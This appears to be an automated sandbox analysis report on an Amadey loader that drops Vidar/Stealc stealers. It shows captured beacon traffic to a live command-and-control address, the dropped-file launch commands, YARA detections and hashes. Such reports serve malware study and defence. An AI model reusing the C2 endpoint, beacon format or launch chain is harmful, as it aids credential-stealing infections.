                                                                Jul 5, 2024 04:25:14.035090923 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:25:14.733037949 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:25:14 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                148192.168.2.44989177.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:25:14.863358021 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:25:15.586893082 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:25:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                149192.168.2.44989277.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:25:15.596589088 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:25:16.291727066 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:25:16 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:22:22:51
                                                                Start date:04/07/2024
                                                                Path:C:\Users\user\Desktop\So7a8eQerR.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\So7a8eQerR.exe"
                                                                Imagebase:0x950000
                                                                File size:1'850'368 bytes
                                                                MD5 hash:1608CACCC377A28575B839E3EEC49314
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1637490155.0000000005120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1677709816.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:1
                                                                Start time:22:22:53
                                                                Start date:04/07/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                                                                Imagebase:0x5c0000
                                                                File size:1'850'368 bytes
                                                                MD5 hash:1608CACCC377A28575B839E3EEC49314
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1705047766.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1664831569.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 42%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:22:22:54
                                                                Start date:04/07/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                Imagebase:0x5c0000
                                                                File size:1'850'368 bytes
                                                                MD5 hash:1608CACCC377A28575B839E3EEC49314
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1672963903.0000000005110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1713328912.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:22:23:00
                                                                Start date:04/07/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                Imagebase:0x5c0000
                                                                File size:1'850'368 bytes
                                                                MD5 hash:1608CACCC377A28575B839E3EEC49314
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.1727956863.00000000051D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:4
                                                                Start time:22:23:06
                                                                Start date:04/07/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe"
                                                                Imagebase:0xce0000
                                                                File size:2'544'640 bytes
                                                                MD5 hash:5DF47A238D51FDAD9B442FEB6C833886
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.1957654994.0000000000CE1000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000004.00000002.1957654994.0000000000CE1000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000004.00000002.1962741464.0000000001EDE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:22:23:23
                                                                Start date:04/07/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exe"
                                                                Imagebase:0x240000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:9
                                                                Start time:22:23:23
                                                                Start date:04/07/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:10
                                                                Start time:22:23:23
                                                                Start date:04/07/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CFCBKKKJJJ.exe"
                                                                Imagebase:0x240000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:11
                                                                Start time:22:23:23
                                                                Start date:04/07/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exe"
                                                                Imagebase:0xaa0000
                                                                File size:1'850'368 bytes
                                                                MD5 hash:1608CACCC377A28575B839E3EEC49314
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000003.1961910471.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000002.2002426220.0000000000AA1000.00000040.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 42%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:22:23:23
                                                                Start date:04/07/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:15
                                                                Start time:22:25:22
                                                                Start date:04/07/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exe"
                                                                Imagebase:0x200000
                                                                File size:2'544'640 bytes
                                                                MD5 hash:5DF47A238D51FDAD9B442FEB6C833886
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000F.00000002.3332366463.0000000001745000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000002.3328030922.0000000000201000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000F.00000002.3328030922.0000000000201000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:16
                                                                Start time:22:25:40
                                                                Start date:04/07/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exe"
                                                                Imagebase:0x240000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:17
                                                                Start time:22:25:40
                                                                Start date:04/07/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:18
                                                                Start time:22:25:40
                                                                Start date:04/07/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\AAFIIJDAAA.exe"
                                                                Imagebase:0x240000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:19
                                                                Start time:22:25:40
                                                                Start date:04/07/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:20
                                                                Start time:22:25:40
                                                                Start date:04/07/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exe"
                                                                Imagebase:0x250000
                                                                File size:1'850'368 bytes
                                                                MD5 hash:1608CACCC377A28575B839E3EEC49314
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000003.3329811617.00000000051F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000002.3370645589.0000000000251000.00000040.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 42%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                Reset < >
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1679462297.0000000005340000.00000040.00001000.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5340000_So7a8eQerR.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9423e16427fd955ad7bf7f9ec2392a8e74934f3fb5b2625f6896aa8f13925811
                                                                  • Instruction ID: e74afedfa2f434878f3e507e176bd57ea4c2ec6d3e4d67cf24ac1be99c310d92
                                                                  • Opcode Fuzzy Hash: 9423e16427fd955ad7bf7f9ec2392a8e74934f3fb5b2625f6896aa8f13925811
                                                                  • Instruction Fuzzy Hash: AB2181B720C590BEE606C5406E1C9F77BAEE5D3234330846BF641CE903D36569598632
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1679462297.0000000005340000.00000040.00001000.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5340000_So7a8eQerR.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7c6330bd90e5a9cb071501511a402b7fa779bc253426d6606f2287858fd56040
                                                                  • Instruction ID: 8fd2d8042922f20669e095aa77d8a9a1cffd0f7690e9bfaa35538d7af7faa8ac
                                                                  • Opcode Fuzzy Hash: 7c6330bd90e5a9cb071501511a402b7fa779bc253426d6606f2287858fd56040
                                                                  • Instruction Fuzzy Hash: F91172A734C514FDA149D0816B1CAF637AFE1D6670330C427F643CFD02E2B5AAAA5971
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1679462297.0000000005340000.00000040.00001000.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5340000_So7a8eQerR.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5839cd80f716b72d5bd3e3b48bfe412e3d031952e720b5b065e01825cb72263e
                                                                  • Instruction ID: 40bf4aecd44f43fc6329e17afe9cdcf3e0b7c2f43262c9e0334d8ef18ba82168
                                                                  • Opcode Fuzzy Hash: 5839cd80f716b72d5bd3e3b48bfe412e3d031952e720b5b065e01825cb72263e
                                                                  • Instruction Fuzzy Hash: 171193E720C510BDA145C0816A089F766AFE1D6230330C426F652CE946E2A59AAA5531
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1679462297.0000000005340000.00000040.00001000.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5340000_So7a8eQerR.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2a4c848592706ea16473b506cc329ea49f7fc833b606c84770db2641b4d14b6b
                                                                  • Instruction ID: 21a2cff133d00a82dd8ce6517edabc25a92a1d4d4644b386cec3d1141630300d
                                                                  • Opcode Fuzzy Hash: 2a4c848592706ea16473b506cc329ea49f7fc833b606c84770db2641b4d14b6b
                                                                  • Instruction Fuzzy Hash: 711106A720C150BDF606C4516A189F67BAFE5D3730330C46BF682CED02D2AA5A9A5631
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1679462297.0000000005340000.00000040.00001000.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5340000_So7a8eQerR.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 52098706a263886c816ec25ec5329b072988abba39f88bb818b3b6050634d913
                                                                  • Instruction ID: 08e28851153f13db467aca9e7013d1d2151419b4c496d0a0e6912cfaf68a26f5
                                                                  • Opcode Fuzzy Hash: 52098706a263886c816ec25ec5329b072988abba39f88bb818b3b6050634d913
                                                                  • Instruction Fuzzy Hash: 200140B720C520FDB145C0816B18DF767AFE1D6730371C427FA42CA906E2B99F996931
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1679462297.0000000005340000.00000040.00001000.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5340000_So7a8eQerR.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 45a32c147abf5efe3991b4409c79d76ca712256059f802b0784215af5456474c
                                                                  • Instruction ID: 205bb668481fc5375509d6d46c5a4560b28053263674883973c3cbe7cb0086d4
                                                                  • Opcode Fuzzy Hash: 45a32c147abf5efe3991b4409c79d76ca712256059f802b0784215af5456474c
                                                                  • Instruction Fuzzy Hash: 110162B720C610EDA245C1816A199F677EFE6D22303308427F643C9D46E2A95A995931
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1679462297.0000000005340000.00000040.00001000.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5340000_So7a8eQerR.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e2cfd58f9132e423177d256d55677a481110eed56ac94d9b187d3c8713f81047
                                                                  • Instruction ID: d26415c9b0f9d3ec5ce230bf8a52e26aedfabf17a9a23e4ca85a61726406c632
                                                                  • Opcode Fuzzy Hash: e2cfd58f9132e423177d256d55677a481110eed56ac94d9b187d3c8713f81047
                                                                  • Instruction Fuzzy Hash: F2F0A9B720C110FEF245C54159059F677DEE6E22303308427F542CB541E2796E555531
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1679462297.0000000005340000.00000040.00001000.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5340000_So7a8eQerR.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4363ec73f3fc7c7994927177419601161ec66cd67615d33551478e169db7515e
                                                                  • Instruction ID: ae30acd20ce971e1fee764a68c3af79758e6ac982d5f07b06213c91735467f51
                                                                  • Opcode Fuzzy Hash: 4363ec73f3fc7c7994927177419601161ec66cd67615d33551478e169db7515e
                                                                  • Instruction Fuzzy Hash: 50F0B4B720C110FDB245C0826B089F767EFE1D22303308037F643CDD42A2A95F981931
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1679462297.0000000005340000.00000040.00001000.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5340000_So7a8eQerR.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e6f54504d69e019e682914cc2b7af52b2355c5abe4196329de614b374e9508ef
                                                                  • Instruction ID: e4a5a1cbf2ddc017f426084e538a4b0dc9a8e3a6cb3318f50fb204d4e9ed12be
                                                                  • Opcode Fuzzy Hash: e6f54504d69e019e682914cc2b7af52b2355c5abe4196329de614b374e9508ef
                                                                  • Instruction Fuzzy Hash: 43F059F320C240EFE249D195AA29AF67BEDE7923307304437F643CB98292A91B448531
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1679462297.0000000005340000.00000040.00001000.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5340000_So7a8eQerR.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 01cd2ab41c741a885f80d437c291b4f616f76f255b403bc6fe98724c7fbd2b86
                                                                  • Instruction ID: 6b045356990c423c4df1eb28133625d08cd4f83c7502effa5376111f9bda133e
                                                                  • Opcode Fuzzy Hash: 01cd2ab41c741a885f80d437c291b4f616f76f255b403bc6fe98724c7fbd2b86
                                                                  • Instruction Fuzzy Hash: 92E0AB2324C410EED145D0961A1C5F53FEEA6232303300033F382CEC4291B86A4A5930
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1679462297.0000000005340000.00000040.00001000.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5340000_So7a8eQerR.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b0dab1ce0cfca60f7a33171b33110a2bdafe47496c5d689e29453c32c7596890
                                                                  • Instruction ID: 9ea2e5ddddd29437e60691c6326cbbb308b2fce657362bcf5d441e9f7de78b78
                                                                  • Opcode Fuzzy Hash: b0dab1ce0cfca60f7a33171b33110a2bdafe47496c5d689e29453c32c7596890
                                                                  • Instruction Fuzzy Hash: C9E0686320C410EED249E08651086B27BEEB7A22713700023F383CED4061B81E861830
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1679462297.0000000005340000.00000040.00001000.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5340000_So7a8eQerR.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0f854e981da8b391415cc7a5c62a98b811ddc4caddf515977ae8d132536c0d94
                                                                  • Instruction ID: e1b01094390911db3303b0270c45c58c5cdd768feb0e46e8cf5b8b9ab1de09b1
                                                                  • Opcode Fuzzy Hash: 0f854e981da8b391415cc7a5c62a98b811ddc4caddf515977ae8d132536c0d94
                                                                  • Instruction Fuzzy Hash: 56C0228210C020648014C09518458B3B7CEA0271342600373B2F18E9C1C14F42560231

                                                                  Execution Graph

                                                                  Execution Coverage:9.9%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:10.3%
                                                                  Total number of Nodes:1892
                                                                  Total number of Limit Nodes:84
                                                                  execution_graph 14870 5db7b9 14871 5db6b5 14 API calls 14870->14871 14872 5db7e1 Concurrency::details::_Reschedule_chore 14871->14872 14874 5db806 14872->14874 14877 5dcab1 14872->14877 14875 5db618 14 API calls 14874->14875 14876 5db81e 14875->14876 14878 5dcacf 14877->14878 14879 5dcabf TpCallbackUnloadDllOnCompletion 14877->14879 14878->14874 14879->14878 14770 5f6539 14771 5f63d7 __cftof 2 API calls 14770->14771 14772 5f654a 14771->14772 14587 5f6954 14588 5f696c 14587->14588 14589 5f6962 14587->14589 14590 5f689d 5 API calls 14588->14590 14591 5f6986 14590->14591 14592 5f67fd RtlAllocateHeap 14591->14592 14593 5f6993 __freea 14592->14593 13747 5cac70 13749 5cadc0 13747->13749 13748 5cade6 shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13749->13748 13758 5c44b0 13749->13758 13751 5caeab __cftof 13751->13751 13762 5c54e0 13751->13762 13753 5caf4e 13754 5d7f00 RtlAllocateHeap 13753->13754 13755 5caf8b 13754->13755 13756 5d8040 RtlAllocateHeap 13755->13756 13757 5cb08c 13756->13757 13759 5c44d4 13758->13759 13760 5c4547 __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13759->13760 13761 5d7f00 RtlAllocateHeap 13759->13761 13760->13751 13761->13760 13763 5c5500 13762->13763 13765 5c5600 __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13763->13765 13766 5c21c0 13763->13766 13765->13753 13769 5c2180 13766->13769 13770 5c2196 13769->13770 13773 5f8647 13770->13773 13776 5f7436 13773->13776 13775 5c21a4 